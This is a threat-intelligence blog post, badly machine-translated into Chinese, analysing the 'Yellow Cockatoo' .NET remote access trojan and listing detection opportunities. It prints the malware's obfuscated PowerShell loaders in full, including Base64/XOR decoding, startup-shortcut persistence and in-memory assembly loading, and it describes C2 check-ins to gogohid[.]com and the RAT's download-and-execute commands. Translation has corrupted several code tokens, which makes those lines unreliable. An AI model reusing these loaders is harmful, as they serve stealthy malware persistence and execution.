跳过导航
获取演示
 
 
 
 
 
 
 
 
 
资源 博客 威胁情报

黄色Cockatoo:搜索引擎重定向、内存中远程访问特洛伊木马等

今年夏天,Red Canary Intel检测到执行的恶意活动集群。跨多个行业的净RAT。以下是需要注意的事项。

红金丝雀情报
最初出版。上次修改时间.

黄色Cockatoo是一个涉及执行的活动集群的名称。NET远程访问特洛伊木马程序(RAT),在内存中运行并删除其他有效负载。自2020年6月以来,我们一直在跟踪这一威胁。黄鹦鹉针对多个行业和公司规模的一系列受害者,我们一直在关注,就在本周。

与其他研究重叠

推特从6月开始,黄色凤头鹦鹉引用了一个相关的PowerShell脚本,直到2020年11月,Morphesc的研究人员发表了一份他们称之为威胁的详细概述Jupyter Infosteer公司Jupyter Infosteaver与我们称之为黄色Cockatoo的威胁有着显著的重叠,我们将在稍后的文章中详细解释。特别感谢迈克尔·戈雷利克阿诺德·奥西波夫感谢Morphisec对我们各自的研究进行时间比较。

你可能想知道为什么我们给这个活动起了不同的名字

我们将几个月前追踪到的威胁称为“黄鸡”。Morphisec对Jupyter Infosteaver进行了出色的分析,但由于我们根据可见性定义黄色Cockatoo,因此我们想明确指出,我们跟踪这一活动的方式与Morphissec略有不同。此外,当我们看到更多黄色Cockatoo活动时,我们可能会选择以不同的方式定义这个集群,并且我们不想通过采用其他团队的名称来继承其他团队的分析。在本文末尾,我们详细概述了我们的研究如何与莫菲塞克的研究重叠和背离。

检测黄色鹦鹉

虽然我们还没有开发出任何专门用于检测黄色Cockatoo的定制检测分析,但我们有一些探测器在提醒我们的检测工程团队潜在相关行为方面做得很好,包括那些让我们首先关注黄色Cockatao的探测器。

安全小组有很多不同的发现机会来抓捕黄鹦鹉。以下是感染期间可能发生的情况的大致年表,由ATT和CK战术和检测机会,以及帮助我们发现黄鸡活动的行为分析描述。

无论你是否认为自己正在应对黄色鸡冠花感染,以下检测思路也应为应对各种其他威胁提供适当的覆盖范围。

初始访问

黄色Cockatoo似乎通过将搜索引擎查询重定向到一个试图将恶意可执行文件上传到受害机器的网站来获得初始访问权限。可执行文件通过使用Microsoft Word图标来伪装合法性。其名称取决于受害者的搜索查询。例如,如果受害者搜索“search-query”,则可执行文件将被命名为搜索-query.exe.

执行

安装之后,可执行文件生成一个命令行,并创建一个类似名称的.tmp文件,用于启动PowerShell。所有这些都是导致执行恶意动态链接库(DLL)的有效前兆活动,该动态链接库是作为实现的远程访问特洛伊木马(RAT)。NET程序集设计为在内存中加载。

 

以下是PowerShell脚本的修订内容,以方便您使用:

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”-命令“$p='C:\Users\REDACTED\e091d09fa72e9b46db8a0a512eec30c9.txt';$xk='KjycAqXpZMgmwrRYFkDJTfiHdIStWVuELNxvzBOChPUenoGbals';$xrb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item$p;for($i=0;$i-lt$xb.count;){对于($j=0;$j-lt$xk.length;$j++){$xb[$i]=$xb[$i]-bxor$xk[$j]$i++;如果($i-ge$xb.count){$j=$xk.length}}}$xb=[系统文本编码]::UTF8.GetString($xb);即xb美元;"

在上述脚本中,我们有第一个和第二个强大的检测机会。

检测机会#1:命令行中的Base64模糊处理

编码的PowerShell本质上并不是恶意的或可疑的,但对善意的管理员来说,对PowerShell进行编码并不常见。如图所示,合法的PowerShell脚本以Base64形式存储并在运行时读取更不常见。因此,查找PowerShell的执行以及包含术语的相应命令行底座64这是一个很好的方法来抓住黄鸡和各种各样的其他威胁。也就是说,如果不能有效地调整检测逻辑,仅检测此行为可能会产生大量误报。

检测机会#2:命令行中的XOR模糊处理

PowerShell命令(包括逻辑XOR运算符)通常是恶意的,因此查找似乎是PowerShell与包含-布克索操作员。我们通常会看到XOR操作在混淆诸如钴击信标之类的威胁方面效果显著。

坚持不懈

虽然该PowerShell命令包含前两个检测机会,但它还创建了许多.lnk和.dat文件,用于加载命令行脚本以执行前面引用的恶意DLL,并在下面的“技术分析”部分中进行了深入分析。

检测机会3:PowerShell正在写入启动快捷方式

我们经常看到对手使用PowerShell将恶意.lnk文件写入启动目录。在Yellow Cockatoo的上下文中,此持久性机制最终会启动命令行脚本,从而安装恶意DLL。这样,就有必要对似乎是PowerShell在其中创建.lnk文件的进程发出警报应用数据启动文件路径或与包含以下内容的命令行一起执行应用数据。在下面的更多PowerShell代码中,Yellow Cockatoo创建并配置.lnk文件。在检测和调查时,可以处理包含PowerShell的startup.lnk文件,命令提示符,或mshta.exe文件命令可疑。

执行(再次)

上面的.lnk和.dat文件(有时还有一个附加的.cmd文件)最终会启动命令提示符,它启动了另一个可疑的PowerShell块(包含在下面),为我们提供了一些额外的机会来检测黄色Cockatoo。

仅此PowerShell活动就包含了一系列检测机会,包括我们之前建议注意的两个活动:

  • 命令行中的Base64模糊处理
  • 命令行中的异或模糊处理

然而,我们有两个额外的检测器,它们会对这个PowerShell脚本的元素发出警报,您可以在下面的代码块中检查它们:

powershell-w hidden-command“$abab188938847d9e028b83169bd97=$env:appdata+'microsoft\windows\start menu\programs\startup\[REDACTED].lnk';if(-not(test-path$abab185938847d 9e028 b83169b d97)){$a1fe836cd2f4a584c8b26df3c899e=new-object-comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97)$a887c3fc4114a6ae35adcfe97686a.windowstyle=7$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\[REDACTED]\appdata\roaming\microsoft\dwau\[REDACCED].cmd'$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process-name'*powershell*').count-lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1Bal0Byc2gxXk9Kf'DNeUGBUEF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnCS2VsbHlSZVxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXERXYVVcQ2JXTXJFbkpab3ZLQkxSTk9teFN1RhVQcUhrY3R5VEZoalFWZXN6ZGFZ bElmZ0R3aQ=='));对于($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad-lt$afc49a7db894a1989bc60a8b4dcd7.count;){对于($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5-lt$a1841141c743b8d10df14c793537.长度;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a 8b4dcd7【$a0bf2735f83489b6c01ebc52dd3ad】=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]-bxor$a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5]$a0bf2735f83489b6c01ebc52dd3ad++;如果($a0bf2735f83489b6c01ebc52dd3ad-ge$afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}};[system.reflection.assembly]::加载($afc49a7db894a1989bc60a8b4dcd7);[d.m]::运行()}“

检测机会#4:PowerShell正在写入启动快捷方式

PowerShell正在使用系统。反思。装配负载答:。内存中的NET可执行文件。对手经常使用此技术将恶意可执行文件引入到不驻留在磁盘上的环境中。在这种情况下,黄鸡拯救了它。NET可执行文件在磁盘上,但以模糊形式存在。可执行文件的唯一模糊副本将在运行时存在于内存中。查找PowerShell的执行以及包含以下内容的相应命令行系统。反思使我们能够利用这一技术抓住许多威胁。

并行活动

上面引用的最后一位PowerShell最终加载包含内存中的DLL。NETRAT,我们将在这篇博文余下的大部分时间进行讨论。反过来,我们观察到Yellow Cockatoo与RAT并行交付其他有效负载,尽管我们还没有完全分析这些可执行文件。

然而,对其中一个二进制文件(中间的项目符号)的粗略分析表明,它涉及到我们以前与恶意行为相关联的C2域,其中一个域在下面的“技术分析”部分中被多次引用。这些可执行文件随时间变化,包括(但可能不限于)以下内容:

  • 2020年6月和10月:docx2rtf.exe文件/docx2rtf-setup-v1.0-x64.exe(MD5:ba95ebd0d6f6e7861b75149561f1fbd3)
  • 2020年9月:光电设计师7_x86-64.exe(MD5:63c9ace2fb8d1cb7eccf4e861d0e4e45)
  • 2020年11月:专家_PDF.exe(MD5:156c5402667e5aae6971faea8e87bc62)

深潜水。净额定功率

本节详细介绍了我们对RAT的一个版本的分析,该版本仅构成我们称之为黄色鹦鹉的整个活动集群的一个组成部分。

我们分析了以下黄色凤头鹦鹉样本:

  • 文件名:111bc461-1ca8-43c6-97ed-911e0e69fdf8.dll
  • SHA256哈希:30E527E45F50D2BA82865C5679A6FA998EE0A1755361AB01673950810D071C85
  • MD5哈希:4EB6170524B5E18D95BB56B937E89B36

上述DLL隐藏了。在内存中加载的NET RAT。从较高的层次上讲,它可以:

  1. 连接到指挥与控制(C2)域并与之通信
  2. 下载第二级有效载荷
  3. 在循环中执行有效负载(即在无限循环中重复步骤1和2)

在更精细的层面上,黄色鹦鹉执行以下与C2相关的操作:

  1. 它收集各种主机信息(其中一些信息如下所示)。
  2. 它将随机生成的字符串加载到%用户档案%\AppData\Roaming\solarmark.dat,用作主机的唯一标识符。
  3. 它连接到C2服务器(地址:https://gogohid网址[.]com/gate?q=编码_主机_信息)共享各种主机信息(见下文)并检索其第一个命令。
  4. 它在无限循环中检索和解析命令。
  5. 执行命令时,其执行状态报告给网址:https://gogohid[.]com/success?i=编码_CMD_AND_HOST_ID_INFO以及特定信息(见下文)。

正如您在上面第3点和第5点中看到的,C2 URL包含字节编码的JSON字符串(我们将实际字符串替换为=编码主机信息编码_CMD_AND_HOST_ID_INFO分别)。

在C2首次值机期间,黄色斗鸡犬能够传递以下信息:

  • 重型货车:随机生成的值存储在%用户档案%\AppData\Roaming\solarmark.dat
  • pn码:计算机名称
  • 操作系统:Windows操作系统版本
  • x个:基于运行进程的主机体系结构(x64或x86)
  • 公共关系管理:正在运行的进程的权限级别(管理员或用户)
  • 版本:恶意软件版本。固定字符串:DN-DN/FB1型
  • 重量(wg):计算机工作组

C2使用唯一的命令标识符响应初始签入(身份证件). 每当Yellow Cockatoo执行命令时,它都会使用类似编码的URL字符串(参见上面的步骤5)来发送重型货车身份证件返回C2服务器,有效地与C2服务器通信,表明命令已成功执行。

RAT执行以下命令:

  • 放射性同位素当量:下载内存中的可执行缓冲区,并将其注入并加载到c: \windows\system32\msinfo32.exe使用工艺空心化(T1055.012)技术
  • 数字无线电:将可执行文件下载到%温度%\24_CHAR_RANDOM_STRING.exe并执行它
  • 聚苯乙烯:将PowerShell脚本下载到%温度%\24_CHAR_RANDOM_STRING.ps1并用powershell.exe-ExecutionPolicy绕过“%TEMP%\24_CHAR_RANDOM_STRING.ps1”

C2还可以发出空闲命令,使黄色Cockatoo进入休眠状态,等待进一步的命令。

结论

我们希望这些信息和检测机会对任何试图提高检测覆盖率的人都有用。虽然我们不能完全确定黄鸡的分布范围,但它是我们几个月来发现的最常见的威胁之一。一如既往,如果您有任何反馈或问题,请随时向我们发送电子邮件.

附录

与Jupyter Infosteer的异同

虽然这个列表可能并不能代表我们的研究重叠的所有方式,但我们已经确定了我们定义的黄色Cockatoo和Morphisec定义的之间的以下相似之处Jupyter Infostealer公司:

  • .exe命名模式
  • 字符串%用户档案%\AppData\Roaming\solarmark.dat
  • 域gogohid[.]com
  • 45.146.165[.]X的IP地址子网

以下是我们认为可能与Morphisec对Jupyter的分析不同的黄色Cockatoo的方面:

  • 通过搜索引擎重定向首次交付黄色Cockatoo恶意软件
  • 用于C2的附加IP地址,45.146.165[.]221,尽管与Morphesc观察到的子网相同(45.146.165[.]倍)
  • 我们分析了Morphisec称之为“C2 Jupyter客户端”的内容,而他们分析的“信息窃取器”有效载荷是一个浏览器cookie窃取器,我们没有检查它。为此,我们基于中版本的差异。NET程序集。我们以上的技术分析侧重于Morphisec报告中描述的变体DN-DN/FB1型.
  • 我们的分析主要关注端点遥测,包括启动infosteer的PowerShell加载程序是如何进行的。我们关注的遥测有一种稍微不同的调用运行方法:
    • Morphisec分析的一个变量使用调用运行方法[jupyTER.jupyTER]::RuN()
    • 我们重点分析的变体使用了call-run方法[d.m]::运行()

 

 

用记事本打开:保护用户免受恶意JavaScript攻击

 

情报洞察力:2024年5月

 

情报洞察力:2024年4月

 

抑制Fortinet漏洞

订阅我们的博客

 
 
返回页首